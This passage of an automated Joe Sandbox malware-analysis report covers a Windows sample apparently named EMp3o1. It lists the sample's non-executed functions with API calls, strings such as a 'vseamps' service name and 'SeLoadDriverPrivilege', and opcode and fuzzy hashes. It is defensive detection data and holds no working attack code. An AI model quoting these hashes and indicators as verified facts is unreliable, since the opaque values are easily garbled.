237->238 241 7ffdac081404-7ffdac08140e 238->241 242 7ffdac081411-7ffdac08142c 238->242 241->242 242->238 244 7ffdac08142e-7ffdac081436 242->244 245 7ffdac081498-7ffdac0814a6 244->245 246 7ffdac081438-7ffdac08143b 244->246 248 7ffdac0814a8-7ffdac0814b5 call 7ffdac081bcc 245->248 249 7ffdac0814b6 245->249 247 7ffdac081440-7ffdac081449 246->247 250 7ffdac08144b-7ffdac081453 247->250 251 7ffdac081455-7ffdac081465 247->251 248->249 249->202 250->251 253 7ffdac081470-7ffdac081496 251->253 254 7ffdac081467-7ffdac08146e 251->254 253->245 253->247 254->253
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                • String ID:
                                                • API String ID: 73155330-0
                                                • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                • Instruction ID: c1c49ef173ecd2a2a18b51c334b48c9e5ad16a05a548edc4b18fc2191291e188
                                                • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                • Instruction Fuzzy Hash: 48815E22B1A78245E6218B359410179B694FF66BE4F14C335EF5953793DF3CE0A1934C

                                                Non-executed Functions

                                                Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                • String ID:
                                                • API String ID: 3526400053-0
                                                • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                • API String ID: 3408796845-4213300970
                                                • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                • String ID: ampStopSingletone: logging ended
                                                • API String ID: 2048888615-3533855269
                                                • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ErrorLastManagerOpen$FileModuleName
                                                • String ID: /remove$/service$vseamps
                                                • API String ID: 67513587-3839141145
                                                • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                  • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressProc$Load$Library
                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                • API String ID: 3981747205-232180764
                                                • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                • String ID:
                                                • API String ID: 4284112124-0
                                                • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                • String ID: vseamps
                                                • API String ID: 3693165506-3944098904
                                                • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: FileModuleName
                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                • API String ID: 514040917-4022980321
                                                • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                • String ID:
                                                • API String ID: 2057259594-0
                                                • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                • String ID:
                                                • API String ID: 3103264659-0
                                                • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                Function 00007FFDAC082630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                • Instruction ID: f1c933509e1f8cdddf8f4145be2bea6528d4af4c1eff3bce56930e1798c00c8f
                                                • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                • Instruction Fuzzy Hash: 8D31747270AB818AEB608F60E8503ED7365FB94794F44403ADA4E47B9ADF3CD568C718
                                                Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 1269745586-0
                                                • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                Function 00007FFDAC0876E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                • Instruction ID: 5f09794681e17309a01d33d532f5fbd7733a4d4469f5c5be62c47ac91716394e
                                                • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                • Instruction Fuzzy Hash: 0A318232709B818ADB60CF24E8503AE73A4FB887A4F504535EA8D43B5ADF3CC165CB08
                                                Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                • String ID:
                                                • API String ID: 1445889803-0
                                                • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContext
                                                • String ID:
                                                • API String ID: 2202868296-0
                                                • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                Function 00007FFDAC090248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise_clrfp
                                                • String ID:
                                                • API String ID: 15204871-0
